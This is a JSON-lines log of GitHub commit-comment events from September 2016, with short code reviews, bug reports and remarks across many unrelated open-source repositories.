{"id":"4538220470","type":"CommitCommentEvent","actor":{"login":"elebumm"},"repo":{"name":"AshTears/conFusion"},"payload":{"comment":{"id":18957903,"position":null,"line":null,"path":null,"commit_id":"e40de9dd5bd280d7a6d033a374c9c085bfcb8967","created_at":"2016-09-09T05:30:30Z","updated_at":"2016-09-09T05:30:30Z","body":"Very cool project Ashika! I would like to see how far this goes!"}},"created_at":"2016-09-09T05:30:30Z"}
{"id":"4538221436","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/socially"},"payload":{"comment":{"id":18957904,"position":2,"line":2,"path":"client/app.component.ts","commit_id":"ade4bac7570c565ceafdd33b1425faf927e2d1c4","created_at":"2016-09-09T05:30:54Z","updated_at":"2016-09-09T05:30:54Z","body":"import { Mongo } from 'meteor/mongo';"}},"created_at":"2016-09-09T05:30:54Z"}
{"id":"4538221828","type":"CommitCommentEvent","actor":{"login":"bgirard"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":18957905,"position":null,"line":null,"path":null,"commit_id":"b430c15a6c3f7afe2321a4a82a36b1c6a0e46240","created_at":"2016-09-09T05:31:05Z","updated_at":"2016-09-09T05:31:05Z","body":"It was merged early. PR #1798 will address this."}},"created_at":"2016-09-09T05:31:05Z"}
{"id":"4538222431","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":18957906,"position":null,"line":null,"path":null,"commit_id":"75cfcbce4df42d338991e41932a2d755d6e7f0f8","created_at":"2016-09-09T05:31:21Z","updated_at":"2016-09-09T05:31:21Z","body":"Congratz for your first push its only the start of alot of fun :)\r\n:+1:"}},"created_at":"2016-09-09T05:31:21Z"}
{"id":"4538223378","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"araykopotay/super-duper-octo-lamp"},"payload":{"comment":{"id":18957908,"position":3,"line":3,"path":".gitignore","commit_id":"362f05b924978c51aecf49455e68d4267c6d8df6","created_at":"2016-09-09T05:31:49Z","updated_at":"2016-09-09T05:31:49Z","body":"+"}},"created_at":"2016-09-09T05:31:49Z"}
{"id":"4538225448","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"araykopotay/super-duper-octo-lamp"},"payload":{"comment":{"id":18957909,"position":1,"line":1,"path":"README.md","commit_id":"362f05b924978c51aecf49455e68d4267c6d8df6","created_at":"2016-09-09T05:32:47Z","updated_at":"2016-09-09T05:32:47Z","body":"362f05b"}},"created_at":"2016-09-09T05:32:47Z"}
{"id":"4538230747","type":"CommitCommentEvent","actor":{"login":"cfaber"},"repo":{"name":"rjbs/Email-Simple"},"payload":{"comment":{"id":18957916,"position":5,"line":79,"path":"lib/Email/Simple.pm","commit_id":"15c47f4caae26d13693e13101ffd46d415614196","created_at":"2016-09-09T05:35:11Z","updated_at":"2016-09-09T05:35:11Z","body":"This won't work. You need to omit ref $text ||. This is no better than what's there before. Really since you're looking for a scalar reference only, you should check for 'SCALAR' only.\r\n\r\n$ref = HASH would fail with syntax error\r\n$ref = ARRAY would fail with syntax error\r\n$ref = CODE would fail with syntax error\r\n$ref = SCALAR would succeed."}},"created_at":"2016-09-09T05:35:11Z"}
{"id":"4538231279","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18957918,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-09T05:35:24Z","updated_at":"2016-09-09T05:35:24Z","body":"iteration (Unknown) - i386-Windows-7-VisualStudio-12: Tests Failed (2065 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.35%25-red.svg)</a> \n"}},"created_at":"2016-09-09T05:35:24Z"}
{"id":"4538233026","type":"CommitCommentEvent","actor":{"login":"H1H1T"},"repo":{"name":"H1H1T/ionic"},"payload":{"comment":{"id":18957922,"position":null,"line":null,"path":null,"commit_id":"a6998da409e1ebcd525f7b6e2d7e2d2c66061ad9","created_at":"2016-09-09T05:36:07Z","updated_at":"2016-09-09T05:36:07Z","body":"1"}},"created_at":"2016-09-09T05:36:07Z"}
{"id":"4538234249","type":"CommitCommentEvent","actor":{"login":"chandra-patel"},"repo":{"name":"rtCamp/rtsocial"},"payload":{"comment":{"id":18957924,"position":null,"line":null,"path":null,"commit_id":"e13b90c905e9eede92cb7a9dad352e43fa0971e5","created_at":"2016-09-09T05:36:35Z","updated_at":"2016-09-09T05:36:35Z","body":"Hello @desaiuditd @rahul286 \r\n\r\nI have removed the code as there was some issues like activity meta information layout break on activity page as well as on single activity page. Also issue in sharing. Also it not support `Top` and `Bottom` option to show the social icons.\r\n\r\n@desaiuditd You called `rtsocial()` in `rtsocial_bp_activity_meta()` which is not work if `Manual` option not selected as that condition added in `rtsocial()`.\r\n\r\n`if ( isset( $options ) && !empty( $options ) && $options[ 'placement_options_set' ] != 'manual' ) {\r\n        return;\r\n }`\r\n\r\nI have also doubts about `Manual` option. `rtsocial()` function should work independent of option. But I didn't have any prior knowledge of this. I talked with team, but we need more time to think on it.\r\n\r\nThese are the reasons and I removed the merged code to release the plugin with other changes.\r\n\r\n@desaiuditd I think, we can't use the `bp_activity_entry_meta` action to show the social icons.\r\n\r\nI didn't look into it further as I don't have more time on it at that time.\r\n\r\nAnd yes, I am sorry to didn't let you know about this.\r\n\r\nRegards,\r\nChandra\r\n\r\n"}},"created_at":"2016-09-09T05:36:35Z"}
{"id":"4538238329","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18957929,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T05:38:16Z","updated_at":"2016-09-09T05:38:16Z","body":"> try~ catchに関しては、下記が基本形かと思うのですが、\r\n\r\nあっております。\r\n\r\n> 実際にコードにthrowを入れるとエラーになってしまいます。こちらはどこに問題があるのでしょうか。\r\n\r\n画像をみる限り、実は問題なく正常に動いた結果になるかと思います(これからコード確認いたします)。\r\n\r\n#### 前提知識\r\n```\r\nthrow new Exception('エラーが発生しました');\r\n```\r\nは例外を意図的に発生させる命令になります。\r\n\r\nこのうえで try ~ catch 構文はどのような構文なのかもう一度調べてみましょう！\r\n\r\n"}},"created_at":"2016-09-09T05:38:16Z"}
{"id":"4538238981","type":"CommitCommentEvent","actor":{"login":"AlenOsmanagic"},"repo":{"name":"AlenOsmanagic/Zadace"},"payload":{"comment":{"id":18957932,"position":null,"line":null,"path":null,"commit_id":"37a50c70b84aff380d61af72a76693db848050e9","created_at":"2016-09-09T05:38:32Z","updated_at":"2016-09-09T05:38:32Z","body":"Ovaj u WIPu sam koristio zadnje dvije zadaće. Al ga sam ja koristim cini mi\nse. Jer kad god dodjem on je slobodan. Kazu kao razlog jer je stari Xcode\nna njemu.\n\nDana 08.09.2016. 23:08, osoba \"irfanG\" <notifications@github.com> je\nnapisala:\n\n> kakav ti imas racunar? jel neki hackintosh? mozda da vidis ovaj sto je u\n> wipu?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AlenOsmanagic/Zadace/commit/37a50c70b84aff380d61af72a76693db848050e9#commitcomment-18953065>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATLjicjgmyasLAOnwPVAUsE1uVxC1tafks5qoHlqgaJpZM4J4dIZ>\n> .\n>\n"}},"created_at":"2016-09-09T05:38:32Z"}
{"id":"4538240379","type":"CommitCommentEvent","actor":{"login":"Scarlett4869Wang"},"repo":{"name":"Scarlett4869Wang/AlgorithmPool"},"payload":{"comment":{"id":18957934,"position":null,"line":null,"path":null,"commit_id":"03d83990ef75ac67985f91dcbf1281971de54a5b","created_at":"2016-09-09T05:39:11Z","updated_at":"2016-09-09T05:39:11Z","body":"the description of Recursion 01"}},"created_at":"2016-09-09T05:39:11Z"}
{"id":"4538242677","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18957940,"position":35,"line":90,"path":"spring-tx/src/main/java/org/springframework/transaction/config/AnnotationDrivenBeanDefinitionParser.java","commit_id":"4741a12fdc43782cc14692f58f3213edc18add7f","created_at":"2016-09-09T05:40:10Z","updated_at":"2016-09-09T05:40:10Z","body":"It's not a duplicate bean registration. Rather than asking why it's not protected, maybe you should explain how it is a problem for you. Commit comments aren't a great to exchange idea so feel free to create an issue in the tracker with your problem and we can take it from there."}},"created_at":"2016-09-09T05:40:10Z"}
{"id":"4538246313","type":"CommitCommentEvent","actor":{"login":"ranglanimanish90"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":18957946,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-09T05:41:40Z","updated_at":"2016-09-09T05:41:40Z","body":"Hi Ryan,\r\nCan you please share your working REST API code? Thanks"}},"created_at":"2016-09-09T05:41:40Z"}
{"id":"4538249316","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18957953,"position":91,"line":91,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-09T05:42:55Z","updated_at":"2016-09-09T05:42:55Z","body":"Have a look at `InjectionTest` from tempto-examples.\r\nTry to put `@Named(\"databases.presto.ssl_port\") String prestoSslPort` as a `setup(..)` argument and annotate `setup()` with `@Inject`. Let me know if it works then. Are other config properties visible during `setup()`? Maybe we have a bug in tempto."}},"created_at":"2016-09-09T05:42:55Z"}
{"id":"4538249346","type":"CommitCommentEvent","actor":{"login":"insolor"},"repo":{"name":"jakul/python-transifex"},"payload":{"comment":{"id":18957954,"position":87,"line":92,"path":"README.md","commit_id":"86399d4cbddb2cf19726188b7630b6cc43b8336c","created_at":"2016-09-09T05:42:57Z","updated_at":"2016-09-09T05:42:57Z","body":"Needs empty line higher to show this line as code block. The same with the later code blocks in the instruction."}},"created_at":"2016-09-09T05:42:57Z"}
{"id":"4538256056","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18957965,"position":8,"line":128,"path":"rtgui/guiutils.h","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-09T05:45:45Z","updated_at":"2016-09-09T05:45:45Z","body":"If this is supposed to be a base class, never forget to add a default virtual destructor."}},"created_at":"2016-09-09T05:45:45Z"}
{"id":"4538260859","type":"CommitCommentEvent","actor":{"login":"SergiMateo"},"repo":{"name":"bsc-pm/mcxx"},"payload":{"comment":{"id":18957974,"position":5,"line":8169,"path":"src/frontend/cxx-scope.c","commit_id":"28750f70f13f629b1b84007342f9da9a55ea84a1","created_at":"2016-09-09T05:47:45Z","updated_at":"2016-09-09T05:47:45Z","body":"You're right, I will fix it soon ;)  Thanks!"}},"created_at":"2016-09-09T05:47:45Z"}
{"id":"4538261555","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18957977,"position":null,"line":null,"path":null,"commit_id":"37a6238ab2e731a709052994d4e952cc8e6b46e5","created_at":"2016-09-09T05:48:03Z","updated_at":"2016-09-09T05:48:03Z","body":"Nice colors! :rainbow:"}},"created_at":"2016-09-09T05:48:03Z"}
{"id":"4538262292","type":"CommitCommentEvent","actor":{"login":"SergiMateo"},"repo":{"name":"bsc-pm/mcxx"},"payload":{"comment":{"id":18957978,"position":13,"line":8177,"path":"src/frontend/cxx-scope.c","commit_id":"28750f70f13f629b1b84007342f9da9a55ea84a1","created_at":"2016-09-09T05:48:20Z","updated_at":"2016-09-09T05:48:20Z","body":"You're also right here. Thanks!"}},"created_at":"2016-09-09T05:48:20Z"}
{"id":"4538262366","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18957979,"position":8,"line":161,"path":"rtgui/toolpanel.cc","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-09T05:48:22Z","updated_at":"2016-09-09T05:48:22Z","body":"Uh, oh, this doesn't look like good OO design. Isn't there a better way without those reinterpreting casts?"}},"created_at":"2016-09-09T05:48:22Z"}
{"id":"4538263910","type":"CommitCommentEvent","actor":{"login":"johnboiles"},"repo":{"name":"fastlane/fastlane"},"payload":{"comment":{"id":18957981,"position":20,"line":198,"path":"sigh/lib/assets/resign.sh","commit_id":"b9ceba3814a53f600557f2357c5fcc9b032ed8ab","created_at":"2016-09-09T05:49:05Z","updated_at":"2016-09-09T05:49:05Z","body":"`--use-app-entitlements` doesn't take a parameter, so there shouldn't be a `shift` here. This breaks the `use-app-entitlements` option when using resign from fastlane :("}},"created_at":"2016-09-09T05:49:05Z"}
{"id":"4538268243","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18957994,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T05:50:56Z","updated_at":"2016-09-09T05:50:56Z","body":"... and it already the second time, see http://tests.stockfishchess.org/tests/view/57922cac0ebc5972faa16b8b\r\n\r\n"}},"created_at":"2016-09-09T05:50:56Z"}
{"id":"4538268365","type":"CommitCommentEvent","actor":{"login":"HeadWar"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":18957995,"position":null,"line":null,"path":null,"commit_id":"f84b92776632daa36528dd2ca14256c2d1cd80ae","created_at":"2016-09-09T05:50:58Z","updated_at":"2016-09-09T05:50:58Z","body":"Is it really skilll_electronics, with three l's?"}},"created_at":"2016-09-09T05:50:58Z"}
{"id":"4538271276","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/everypolitician-data"},"payload":{"comment":{"id":18958000,"position":null,"line":null,"path":null,"commit_id":"bb2d28187556f63da1fe4eadbb0c1ae880701e1e","created_at":"2016-09-09T05:52:12Z","updated_at":"2016-09-09T05:52:12Z","body":"Perhaps worth adding a pointer in the commit message to how the GITHUB_ACCESS_TOKEN environment variable actually got turned into the line that's actually in the file? (Presumably just by adding a URL that describes that process)"}},"created_at":"2016-09-09T05:52:12Z"}
{"id":"4538272646","type":"CommitCommentEvent","actor":{"login":"dissonanz"},"repo":{"name":"dissonanz/rbs-sandbox"},"payload":{"comment":{"id":18958001,"position":null,"line":null,"path":null,"commit_id":"b8d34b571b98bf71c2729445c5ece0b2ff28f635","created_at":"2016-09-09T05:52:44Z","updated_at":"2016-09-09T05:52:44Z","body":"@cloudnautique the AzureAd configuration works, but can you please take a look at this change and see if you figure out why I'm getting the following error?\r\n\r\n```\r\nrancher/members.go:57: cannot use members (type []client.ProjectMember) as type []interface {} in field value\r\n```\r\n"}},"created_at":"2016-09-09T05:52:44Z"}
{"id":"4538276731","type":"CommitCommentEvent","actor":{"login":"zanchey"},"repo":{"name":"floam/fish-shell"},"payload":{"comment":{"id":18958012,"position":null,"line":null,"path":null,"commit_id":"404c12b7491d5178524d35ee96667df8cbdd815b","created_at":"2016-09-09T05:54:35Z","updated_at":"2016-09-09T05:54:35Z","body":"For the record it generally doesn't matter what version of autoconf is available on RHEL 5, because we generate the configure script as part of the release process.\r\n\r\nThere is a fair bit of churn in this patch, and it adds a whole stack of symbols (with single-threaded checks) which don't get used; I would advise against merging it."}},"created_at":"2016-09-09T05:54:35Z"}
{"id":"4538276856","type":"CommitCommentEvent","actor":{"login":"Bliinky"},"repo":{"name":"team-thirtyfour/js13kgame"},"payload":{"comment":{"id":18958013,"position":28,"line":74,"path":"src/Collision.js","commit_id":"319cbce339f04756b93e97cfe4f06053814e9b39","created_at":"2016-09-09T05:54:38Z","updated_at":"2016-09-09T05:54:38Z","body":"ben si les cordonnées eA.x corresponds au coin gauche de eA et eA.x + eA.widht corresponds au coin droit de eA alors ça semble pas mauvais le eA.x = eB.x - eA.widht mais je ne suis plus sur de rien\r\n"}},"created_at":"2016-09-09T05:54:38Z"}
{"id":"4538278751","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18958015,"position":null,"line":null,"path":null,"commit_id":"33d50134c1dfad6c18a19a85430b81df7b017837","created_at":"2016-09-09T05:55:27Z","updated_at":"2016-09-09T05:55:27Z","body":"Component name choices follow the [guides](http://vue-loader.vuejs.org/en/start/tutorial.html) suggested naming conventions."}},"created_at":"2016-09-09T05:55:27Z"}
{"id":"4538278842","type":"CommitCommentEvent","actor":{"login":"AlexReimann"},"repo":{"name":"stonier/feed_the_troll"},"payload":{"comment":{"id":18958016,"position":18,"line":17,"path":"parameters/demo_reconfiguration.yaml","commit_id":"61d47f39aa2ab50ae465c2334bde1ac69b97bff1","created_at":"2016-09-09T05:55:29Z","updated_at":"2016-09-09T05:55:29Z","body":"`reconfigure_parameter_namespace`?"}},"created_at":"2016-09-09T05:55:29Z"}
{"id":"4538279384","type":"CommitCommentEvent","actor":{"login":"buidunght91"},"repo":{"name":"buidunght91/blink"},"payload":{"comment":{"id":18958017,"position":null,"line":null,"path":null,"commit_id":"0bd6eb709d0dff64b6844e9dacdefc193f3e191e","created_at":"2016-09-09T05:55:40Z","updated_at":"2016-09-09T05:55:40Z","body":"ok"}},"created_at":"2016-09-09T05:55:40Z"}
{"id":"4538280337","type":"CommitCommentEvent","actor":{"login":"nonolily"},"repo":{"name":"nonolily/trans"},"payload":{"comment":{"id":18958018,"position":null,"line":null,"path":null,"commit_id":"6d3b03238adf5aa8de306a48f9f2f0d1a495e47c","created_at":"2016-09-09T05:56:04Z","updated_at":"2016-09-09T05:56:04Z","body":"修改地图样式"}},"created_at":"2016-09-09T05:56:04Z"}
{"id":"4538282405","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18958024,"position":null,"line":null,"path":null,"commit_id":"72e904a5d51be7283e5e940ccf00a56a30725530","created_at":"2016-09-09T05:56:55Z","updated_at":"2016-09-09T05:56:55Z","body":"[Just kidding](https://github.com/Musare/MusareNode/commit/360f3b0d54c332939a2360e595c6e0a998d40e1d) :)"}},"created_at":"2016-09-09T05:56:55Z"}
{"id":"4538282775","type":"CommitCommentEvent","actor":{"login":"genyaoye"},"repo":{"name":"genyaoye/JingzhouWeather"},"payload":{"comment":{"id":18958026,"position":null,"line":null,"path":null,"commit_id":"07d34f2ad02bc147f899a30b40308f033563c9d8","created_at":"2016-09-09T05:57:04Z","updated_at":"2016-09-09T05:57:04Z","body":"html文件因兼容性问题，请用IE浏览器打开"}},"created_at":"2016-09-09T05:57:04Z"}
{"id":"4538282986","type":"CommitCommentEvent","actor":{"login":"buidunght91"},"repo":{"name":"buidunght91/blink"},"payload":{"comment":{"id":18958028,"position":null,"line":null,"path":null,"commit_id":"0bd6eb709d0dff64b6844e9dacdefc193f3e191e","created_at":"2016-09-09T05:57:10Z","updated_at":"2016-09-09T05:57:10Z","body":"goood"}},"created_at":"2016-09-09T05:57:10Z"}
{"id":"4538284277","type":"CommitCommentEvent","actor":{"login":"DPSablowski"},"repo":{"name":"DPSablowski/croco"},"payload":{"comment":{"id":18958031,"position":null,"line":null,"path":null,"commit_id":"2d1a3e9248a49b849843da052d4ead1bec300212","created_at":"2016-09-09T05:57:41Z","updated_at":"2016-09-09T05:57:41Z","body":"Readme updated"}},"created_at":"2016-09-09T05:57:41Z"}
{"id":"4538284651","type":"CommitCommentEvent","actor":{"login":"dodgevipert56"},"repo":{"name":"UnrealCourse/02_BullCowGame"},"payload":{"comment":{"id":18958033,"position":null,"line":null,"path":null,"commit_id":"cd2f5ac55cb5cfd314d66880cf4776a5f2210424","created_at":"2016-09-09T05:57:50Z","updated_at":"2016-09-09T05:57:50Z","body":"Im getting this error ,\r\nSeverity\tCode\tDescription\tProject\tFile\tLine\tSuppression State\r\nError (active)\t\tno suitable constructor exists to convert from \"char\" to \"std::basic_string<char, std::char_traits<char>, std::allocator<char>>\"\tBullCowGame\tc:\\Users\\User\\Documents\\Visual Studio 2015\\Projects\\UNREAL\\Section_02\\BullCowGame\\FBullCowGame.cpp\t126\t\r\n"}},"created_at":"2016-09-09T05:57:50Z"}
{"id":"4538285611","type":"CommitCommentEvent","actor":{"login":"genyaoye"},"repo":{"name":"genyaoye/JingzhouWeather"},"payload":{"comment":{"id":18958034,"position":null,"line":null,"path":null,"commit_id":"f68015c531ac0597758b5c3f1f486ce41e8c4428","created_at":"2016-09-09T05:58:13Z","updated_at":"2016-09-09T05:58:13Z","body":"非中央气象台借口"}},"created_at":"2016-09-09T05:58:13Z"}
{"id":"4538286377","type":"CommitCommentEvent","actor":{"login":"rickhanlonii"},"repo":{"name":"binary-com/binary-next-gen"},"payload":{"comment":{"id":18958035,"position":4,"line":4,"path":"src/_selectors/BootSelectors.js","commit_id":"355ed60c35a3b9b18eeea179e2c4404f96ccdc59","created_at":"2016-09-09T05:58:33Z","updated_at":"2016-09-09T05:58:33Z","body":"Just a heads up: `toJS` returns a new object every time it's called which means this selector will always rerun and never return the cached value. This can be fixed by moving the `toJS` into the result function:\r\n\r\n```\r\nexport const bootSelector = createSelector(\r\n    state => state.boot,\r\n    boot => ({ ...(boot.toJS()) })\r\n);\r\n```"}},"created_at":"2016-09-09T05:58:33Z"}
{"id":"4538287567","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18958036,"position":null,"line":null,"path":null,"commit_id":"360f3b0d54c332939a2360e595c6e0a998d40e1d","created_at":"2016-09-09T05:59:02Z","updated_at":"2016-09-09T05:59:02Z","body":"@atjonathan @KrisVos130 should we have the `backend/package.json` use spaces as well?"}},"created_at":"2016-09-09T05:59:02Z"}
{"id":"4538290427","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18958042,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T06:00:12Z","updated_at":"2016-09-09T06:00:12Z","body":"Not sure if we use it while is salving in the database.\r\nIn Brazil the format is `99999-999` and is salving fine and display correct in the admin."}},"created_at":"2016-09-09T06:00:12Z"}
{"id":"4538290449","type":"CommitCommentEvent","actor":{"login":"gambhiro"},"repo":{"name":"profound-labs/its-essential-meaning"},"payload":{"comment":{"id":18958043,"position":null,"line":null,"path":null,"commit_id":"e6657d5cc92110384f27410b6652e926bcd773b8","created_at":"2016-09-09T06:00:13Z","updated_at":"2016-09-09T06:00:13Z","body":"Yes, the Mac does that. The SO link was good, particularly the tip about finding and removing the files in one command.\r\n\r\nThis is fixed now in the last commit."}},"created_at":"2016-09-09T06:00:13Z"}
{"id":"4538291791","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18958068,"position":null,"line":null,"path":null,"commit_id":"6eafd4f2708def19dfc1ba0c1d2c8a44d9e9561f","created_at":"2016-09-09T06:00:34Z","updated_at":"2016-09-09T06:00:34Z","body":"Зачем это?"}},"created_at":"2016-09-09T06:00:34Z"}
{"id":"4538298558","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"calmcom/AlamofireImage"},"payload":{"comment":{"id":18958110,"position":null,"line":null,"path":null,"commit_id":"0469d9ebab544478ba6644a9881aba3833ce1a86","created_at":"2016-09-09T06:03:00Z","updated_at":"2016-09-09T06:03:00Z","body":"All of the fields after urlString are optional.  See method declaration:\r\n\r\n```swift\r\npublic func request(\r\n    _ urlString: URLStringConvertible,\r\n    method: HTTPMethod = .get,\r\n    parameters: [String: Any]? = nil,\r\n    encoding: ParameterEncoding = .url,\r\n    headers: [String: String]? = nil)\r\n    -> DataRequest\r\n```\r\n\r\nso you can provide as many as you'd like. In your case\r\n\r\n```swift\r\nAlamofire.request(\"www.myurl.com\", method: .post, parameters: params)\r\n```"}},"created_at":"2016-09-09T06:03:00Z"}
{"id":"4538300030","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18958117,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T06:03:34Z","updated_at":"2016-09-09T06:03:34Z","body":"@pb00068 : I looked carefully, and I see it is not the same. Anyway, thank you..."}},"created_at":"2016-09-09T06:03:34Z"}
{"id":"4538301078","type":"CommitCommentEvent","actor":{"login":"Rivet-the-Zombie"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":18958119,"position":null,"line":null,"path":null,"commit_id":"f84b92776632daa36528dd2ca14256c2d1cd80ae","created_at":"2016-09-09T06:03:59Z","updated_at":"2016-09-09T06:03:59Z","body":"Probably not, but that's a separate thing from this PR."}},"created_at":"2016-09-09T06:03:59Z"}
{"id":"4538301425","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"calmcom/AlamofireImage"},"payload":{"comment":{"id":18958121,"position":null,"line":null,"path":null,"commit_id":"0469d9ebab544478ba6644a9881aba3833ce1a86","created_at":"2016-09-09T06:04:07Z","updated_at":"2016-09-09T06:04:07Z","body":"If you do want to include an enum, it's an instance of the enum `ParameterEncoding` which is defined in `ParameterEncoding.swift` as \r\n\r\n```swift\r\npublic enum ParameterEncoding {\r\n    case url\r\n    case urlEncodedInURL\r\n    case json\r\n    case propertyList(PropertyListSerialization.PropertyListFormat, PropertyListSerialization.WriteOptions)\r\n    case custom((URLRequestConvertible, [String: Any]?) -> (URLRequest, Error?))\r\n```\r\n\r\nThe default is `.url`"}},"created_at":"2016-09-09T06:04:07Z"}
{"id":"4538302320","type":"CommitCommentEvent","actor":{"login":"chrisbra"},"repo":{"name":"chrisbra/changesPlugin"},"payload":{"comment":{"id":18958126,"position":4,"line":14,"path":"autoload/changes.vim","commit_id":"ab2155ba90551fc260548236e413aae2ea79d909","created_at":"2016-09-09T06:04:26Z","updated_at":"2016-09-09T06:04:26Z","body":"thanks. fixed it."}},"created_at":"2016-09-09T06:04:26Z"}
{"id":"4538303909","type":"CommitCommentEvent","actor":{"login":"lolokeeer"},"repo":{"name":"lolokeeer/krzysztof"},"payload":{"comment":{"id":18958130,"position":null,"line":null,"path":null,"commit_id":"0003ec8529e92a0889b4795db39e554879f721ae","created_at":"2016-09-09T06:05:05Z","updated_at":"2016-09-09T06:05:05Z","body":"log aut\r\n"}},"created_at":"2016-09-09T06:05:05Z"}
{"id":"4538308872","type":"CommitCommentEvent","actor":{"login":"srisurya95"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":18958137,"position":null,"line":null,"path":null,"commit_id":"2fde6ecb231c7696600e6dfe2d3b1fafa52afc50","created_at":"2016-09-09T06:07:03Z","updated_at":"2016-09-09T06:07:03Z","body":"MarshMallow nice"}},"created_at":"2016-09-09T06:07:03Z"}
{"id":"4538310383","type":"CommitCommentEvent","actor":{"login":"stegano"},"repo":{"name":"stegano/TableExport"},"payload":{"comment":{"id":18958140,"position":null,"line":null,"path":null,"commit_id":"a257297d0015b76e730d23798d8bd59483370102","created_at":"2016-09-09T06:07:37Z","updated_at":"2016-09-09T06:07:37Z","body":"정보만 생성.. "}},"created_at":"2016-09-09T06:07:37Z"}
{"id":"4538313250","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18958143,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T06:08:46Z","updated_at":"2016-09-09T06:08:46Z","body":"@IIvec Sorry I can't see any difference. Please tell me the difference, thanks in advannce."}},"created_at":"2016-09-09T06:08:46Z"}
{"id":"4538316683","type":"CommitCommentEvent","actor":{"login":"srazi"},"repo":{"name":"luastoned/turbo-telegram"},"payload":{"comment":{"id":18958147,"position":397,"line":385,"path":"telegram.lua","commit_id":"3e12303127fe9f3a39f7af088d43a278173aea19","created_at":"2016-09-09T06:10:06Z","updated_at":"2016-09-09T06:10:06Z","body":"I used this `telegram.createBot(token)` in my code but assert line#29 occurs. I have to add `telegram.token = token` here. "}},"created_at":"2016-09-09T06:10:06Z"}
{"id":"4538316773","type":"CommitCommentEvent","actor":{"login":"Madhukar04"},"repo":{"name":"Madhukar04/hello-world"},"payload":{"comment":{"id":18958148,"position":null,"line":null,"path":null,"commit_id":"15d8ef4c9696e657263e5f670c0a598672458e8e","created_at":"2016-09-09T06:10:09Z","updated_at":"2016-09-09T06:10:09Z","body":"hkjh"}},"created_at":"2016-09-09T06:10:09Z"}
